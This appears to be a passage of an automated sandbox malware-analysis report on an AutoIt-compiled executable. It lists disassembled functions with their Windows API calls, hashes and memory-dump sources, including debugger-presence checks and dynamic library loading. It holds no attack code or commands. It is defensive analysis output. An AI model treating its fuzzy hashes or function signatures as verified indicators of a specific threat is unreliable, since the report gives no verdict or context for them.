                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                          • String ID: AutoIt
                                                                          • API String ID: 1986988660-2515660138
                                                                          • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                          • Instruction ID: cf05697187c5f3f344de7d96f5f9b9fd4cb61d4b66649aeeff9eec30152ece5e
                                                                          • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                          • Instruction Fuzzy Hash: 5EC1E72291EB42ADE640BB14AC612F4F7A4FF98B40FD20236D44C42671FF7CA946DB60
                                                                          Function 00007FF7ADC072C8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                          • String ID: Line:
                                                                          • API String ID: 3135491444-1585850449
                                                                          • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                          • Instruction ID: f2eae5c9dbb4d30690d7139d6fbafac883d478dca51cead9c67d773f26c622d9
                                                                          • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                          • Instruction Fuzzy Hash: 7A415362A0E6869EFB24FB10D4502F9A365FB44744FD55031D64C026B9FF7CE94AC760
                                                                          Function 00007FF7ADC03F04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetOpenFileNameW.COMDLG32 ref: 00007FF7ADC4BAA2
                                                                            • Part of subcall function 00007FF7ADC056D4: GetFullPathNameW.KERNEL32(?,00007FF7ADC056C1,?,00007FF7ADC07A0C,?,?,?,00007FF7ADC0109E), ref: 00007FF7ADC056FF
                                                                            • Part of subcall function 00007FF7ADC03EB4: GetLongPathNameW.KERNELBASE ref: 00007FF7ADC03ED8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Name$Path$FileFullLongOpen
                                                                          • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                          • API String ID: 779396738-2360590182
                                                                          • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                          • Instruction ID: 0faed880350b3d75add3bbca6e9dac1a446b698d67fa3e6addf6c9c1fff13e94
                                                                          • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                          • Instruction Fuzzy Hash: BF316F72A0EB8189E710EF21D8441A9B7A4FB49B84FD94135DE8C47765EF3CD646C720
                                                                          Function 00007FF7ADC24610 Relevance: 4.6, APIs: 3, Instructions: 67timewindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                          • String ID:
                                                                          • API String ID: 3812282468-0
                                                                          • Opcode ID: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                                          • Instruction ID: 615e0e669729b9aa2fe76d73da90c0282b2d4f73705f0e3f78d38e184f803b72
                                                                          • Opcode Fuzzy Hash: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                                          • Instruction Fuzzy Hash: 5731E722A0E7C28BE761AB1190402BDB758E744FC4FD95032DE4C07766EE2CD646CB60
                                                                          Function 00007FF7ADC06F60 Relevance: 4.6, APIs: 3, Instructions: 57registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7ADC06F52,?,?,?,?,?,?,00007FF7ADC0782C), ref: 00007FF7ADC06FA5
                                                                          • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7ADC06F52,?,?,?,?,?,?,00007FF7ADC0782C), ref: 00007FF7ADC06FD3
                                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF7ADC06F52,?,?,?,?,?,?,00007FF7ADC0782C), ref: 00007FF7ADC06FFA
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3677997916-0
                                                                          • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                          • Instruction ID: be6cdcf6a73f15477bccb7af2ca52c5fce057ab361a6972fb305a2807bb3c160
                                                                          • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                          • Instruction Fuzzy Hash: 9621AC32A1D7518BD7509F15E440A6EB3A4FB48B84FC55130EB8D83B24EF39E4068B00
                                                                          Function 00007FF7ADC29118 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentExitTerminate
                                                                          • String ID:
                                                                          • API String ID: 1703294689-0
                                                                          • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                          • Instruction ID: a79779904a5ec2acc1f9d1274cffdfb1c5569e400aa83073f70d64c8bc924825
                                                                          • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                          • Instruction Fuzzy Hash: F6E01220F5E3018AEB457B615C86279A362DF48741FC25438C80E023A2FD3DE40A8220
                                                                          Function 00007FF7ADC166C0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 466COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Init_thread_footer
                                                                          • String ID: CALL
                                                                          • API String ID: 1385522511-4196123274
                                                                          • Opcode ID: 24061c5982f2d3e817e045593c76e51459b54cde2f485c3431a9fa5c614c0b1a
                                                                          • Instruction ID: 490ec864f974cac118f1e18eb9d3a1251be29793c4e02461bcfa8865d101cc11
                                                                          • Opcode Fuzzy Hash: 24061c5982f2d3e817e045593c76e51459b54cde2f485c3431a9fa5c614c0b1a
                                                                          • Instruction Fuzzy Hash: 51225B72A0E6528EEB10EF65D0403ACA7A1FB44B88FD24136DB5D577A5EF38E446C360
                                                                          Function 00007FF7ADC06838 Relevance: 3.1, APIs: 2, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                          • Instruction ID: 340c2deb38c2083815e795a9be70a5dd9c52d26c911ecd9e75074254641ccc28
                                                                          • Opcode Fuzzy Hash: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                          • Instruction Fuzzy Hash: 5841917294E6428BF760AF10E418339B7A1EB45BA8FD64330DA6D0B6E5EF3DD4068750
                                                                          Function 00007FF7ADC06460 Relevance: 3.1, APIs: 2, Instructions: 91libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressFreeProc
                                                                          • String ID:
                                                                          • API String ID: 2632591731-0
                                                                          • Opcode ID: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                          • Instruction ID: 770eb30611fef371b93210f8b8964a45e8383cbe993e2edcc577cc97b3f9c67a
                                                                          • Opcode Fuzzy Hash: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                          • Instruction Fuzzy Hash: 79416422B1AA129EEB10EF25D4553BCA3A0EB4478CFC64131EA0D476A9EF3CD546C760
                                                                          Function 00007FF7ADC06258 Relevance: 3.1, APIs: 2, Instructions: 72windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_
                                                                          • String ID:
                                                                          • API String ID: 1144537725-0
                                                                          • Opcode ID: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                                          • Instruction ID: 68dc8a7711b092b10d52a65a3e3dabc55d5eba8399518c9e51440789f36f981f
                                                                          • Opcode Fuzzy Hash: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                                          • Instruction Fuzzy Hash: B8419F7290EB458AE751AF11E4443A8B7A8FB48B98FC50035DE4C073A8EF7CD546C760
                                                                          Function 00007FF7ADC43E9C Relevance: 3.0, APIs: 2, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF7ADC3A2E2), ref: 00007FF7ADC43EB0
                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF7ADC3A2E2), ref: 00007FF7ADC43F15
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$Free
                                                                          • String ID:
                                                                          • API String ID: 3328510275-0
                                                                          • Opcode ID: 16a7ac5b8830e35db6f9156b9abe62843fc22596b2181d25e1a7d5c24141830d
                                                                          • Instruction ID: 64bf34c860e5e75c2aa70c7a8cd3ebdbd1592b784011a87b60bd3bfa48919515
                                                                          • Opcode Fuzzy Hash: 16a7ac5b8830e35db6f9156b9abe62843fc22596b2181d25e1a7d5c24141830d
                                                                          • Instruction Fuzzy Hash: B201DB21B6EB4188EE157F15600906EA661EF84FE0BC90230EE5E037E5EE3CE4428650
                                                                          Function 00007FF7ADC03730 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsThemeActive.UXTHEME ref: 00007FF7ADC03756
                                                                            • Part of subcall function 00007FF7ADC29334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ADC29348
                                                                            • Part of subcall function 00007FF7ADC036E8: SystemParametersInfoW.USER32 ref: 00007FF7ADC03705
                                                                            • Part of subcall function 00007FF7ADC036E8: SystemParametersInfoW.USER32 ref: 00007FF7ADC03725
                                                                            • Part of subcall function 00007FF7ADC037B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC037F2
                                                                            • Part of subcall function 00007FF7ADC037B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC03807
                                                                            • Part of subcall function 00007FF7ADC037B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC0388D
                                                                            • Part of subcall function 00007FF7ADC037B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC03924
                                                                          • SystemParametersInfoW.USER32 ref: 00007FF7ADC03797
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 4207566314-0
                                                                          • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                          • Instruction ID: 608bf828c24fae34bcd8bc22386a8b7b85f919713a80a99525b765ea355d647a
                                                                          • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                          • Instruction Fuzzy Hash: 57014F71D0E3429EF714BB65A8612F5F661EF48700FC60035D40C862B2FE2CB8869B20
                                                                          Function 00007FF7ADC3B3C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 485612231-0
                                                                          • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                          • Instruction ID: af856aa9b87d9ce2b1cd8a92bab5bad39c7977f5f1355699d7cbd59a0cd1d40c
                                                                          • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                          • Instruction Fuzzy Hash: 96E04F50E2F2078AFF0D7BB29809078D692DF48740BC54030C80D46272FD6CE5474620
                                                                          Function 00007FF7ADC404B8 Relevance: 2.6, APIs: 2, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CloseErrorHandleLast
                                                                          • String ID:
                                                                          • API String ID: 918212764-0
                                                                          • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                          • Instruction ID: f5733a35d518555db2f761be048bb35466f9ba000cde44eacda3216af00a47a5
                                                                          • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                          • Instruction Fuzzy Hash: 5B110A91F4E24649FEA47760A48C37CD282CF84760FC61234D91E062F2FDACE8439321
                                                                          Function 00007FF7ADC11475 Relevance: 2.0, APIs: 1, Instructions: 533COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Init_thread_footer
                                                                          • String ID:
                                                                          • API String ID: 1385522511-0
                                                                          • Opcode ID: e869654350b1d585ac28b73911299a849cdf7de5e5dd263a2f3101a0d6b2730c
                                                                          • Instruction ID: ab67c28db06aa190b265080aa9eff418344b5b2109a71dc104a900efbe9b5219
                                                                          • Opcode Fuzzy Hash: e869654350b1d585ac28b73911299a849cdf7de5e5dd263a2f3101a0d6b2730c
                                                                          • Instruction Fuzzy Hash: A7329F22A0E69289EB60EB15D4543B9E761FB84B84FC68131EA4D477B5FF3DE4438720
                                                                          Function 00007FF7ADC620D6 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                                          • Instruction ID: 43a3a22c9600e6df2dc8d2244eb10c08cc394e40b4b4e2c49e6f8d7cd0761624
                                                                          • Opcode Fuzzy Hash: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                                          • Instruction Fuzzy Hash: 53415A22B0EA418AEB10EF65D0403ACA3A0FB54B88FC64535DE0D177A5EF7CE456C361
                                                                          Function 00007FF7ADC28FAC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
